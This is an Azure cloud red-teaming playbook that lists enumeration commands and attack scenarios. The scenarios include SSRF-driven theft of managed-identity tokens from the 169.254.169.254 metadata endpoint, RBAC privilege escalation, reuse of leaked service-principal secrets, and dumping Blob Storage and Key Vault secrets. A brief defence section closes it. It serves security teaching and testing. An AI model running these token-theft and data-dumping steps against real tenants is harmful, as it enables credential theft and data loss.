Azure

This playbook provides red teaming methodology for Azure environments. It covers: Azure cloud fundamentals, enumeration and exploitation techniques, real-world CTF-style scenarios, commands and tools

1. Azure Cloud Overview

Core Components

  • Azure Active Directory (AAD / Entra ID) – Identity & Access Management (users, groups, roles, service principals, managed identities).

  • Azure Resource Manager (ARM) – Control plane for deploying, managing, securing resources.

  • Office 365 / M365 – Productivity suite, integrated with AAD.

Cloud Spaces

  • Control Plane: ARM API, Azure Portal, PowerShell, CLI.

  • Data Plane: Actual resources (VMs, Blob Storage, Functions, etc.).

  • Identity Plane: AAD identities, tokens, RBAC.


2. Authentication in Azure

Methods

  1. Username & Password (long-term)

    az login
    Connect-AzAccount
    Connect-MgGraph -Scopes "Directory.Read.All"
  2. Service Principal (App ID + Secret/Cert)

    az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
    $cred = Get-Credential   # AppID + Secret
    Connect-AzAccount -ServicePrincipal -Tenant <TenantID> -Credential $cred
  3. Access Token (short-term)

    az account get-access-token --resource=https://management.azure.com
    Connect-AzAccount -AccessToken <AAD_AccessToken>
  4. Instance Metadata Service (IMDS) – Auto-issued tokens inside VMs

    curl -H "Metadata:true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Concept: IMDS

  • 169.254.169.254 = internal IP for Azure metadata.

  • Exposes OAuth2 tokens for Managed Identity.

  • Exploitable via SSRF or local compromise.

  • IMDSv1: No session binding → SSRF-prone.

  • IMDSv2 (work in progress for Azure, stronger binding).


3. Enumeration Phase

AAD Discovery

  • Check if target org uses Entra ID:

    curl "https://login.microsoftonline.com/getuserrealm.srf?login=<user>@<domain>&xml=1"
  • List current session:

    Get-MgContext
  • Enumerate roles:

    Get-MgDirectoryRole | ConvertTo-Json
    Get-MgDirectoryRoleMember -DirectoryRoleId <RoleID> -All | ConvertTo-Json
  • Enumerate users & groups:

    Get-MgUser
    Get-MgUserMemberOf -UserId <UserID>
    Get-MgGroup
    Get-MgGroupMember -GroupId <GroupID> | ConvertTo-Json
  • Applications / Service Principals:

    Get-MgApplication
    Get-MgApplication -ApplicationId <AppObjectID> | ConvertTo-Json
    Get-MgApplicationOwner -ApplicationId <AppObjectID> | ConvertTo-Json

4. Exploitation Scenarios

4.1 SSRF → IMDS Token Theft

  1. Find SSRF in a web app on Azure VM.

  2. Target IMDS endpoint:

    curl -H "Metadata:true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"

    → Returns access token for Microsoft Graph API.

  3. Configure with stolen creds:

    az account get-access-token --resource https://graph.microsoft.com
    Connect-AzAccount -AccessToken <Token>
  4. Enumerate tenant, users, groups with Graph API.


4.2 ARM Token Abuse

  • Request ARM-scoped token from IMDS:

    curl -H "Metadata:true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
  • Enumerate resources:

    az vm list --output table
    az storage account list --output table

4.3 Privilege Escalation via RBAC

  • List roles:

    az role assignment list --all
  • If attacker has Owner/Contributor → can create new role or assign higher privileges.

  • Example: Attach User Access Administrator → take over.


4.4 Service Principal Abuse

  • If SP creds are leaked (from GitHub, etc.):

    az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
  • Check assigned roles → escalate or pivot.


5. Post-Exploitation

  • Dump data from Blob Storage:

    az storage blob list --account-name <storage> --container-name <container>
    az storage blob download --account-name <storage> --container-name <container> --name <blob> --file dump.txt
  • Enumerate Key Vault secrets:

    az keyvault secret list --vault-name <vault>
    az keyvault secret show --vault-name <vault> --name <secret>

6. Lateral Movement

  • Use stolen tokens to pivot tenants/subscriptions.

  • Exploit custom role definitions to gain indirect access.

  • Example scenario from CTF (generalized):

    • Attacker compromises VM → retrieves IMDS token.

    • Token has Reader role at subscription level.

    • However, token also has custom role at VM resource scope → allows reading group info.

    • From there, attacker enumerates applications and pivots via Graph API.


7. Detection & Defense

  • Enable Azure AD logs & alerts: Monitor anomalous logins, token use.

  • Restrict IMDS exposure: Disable public endpoints, enforce network rules.

  • Use Conditional Access: Restrict Graph API access by location/device.

  • RBAC Hardening: Audit custom roles, remove broad assignments.

  • Key Vault: Enable firewall & access policies.

Last updated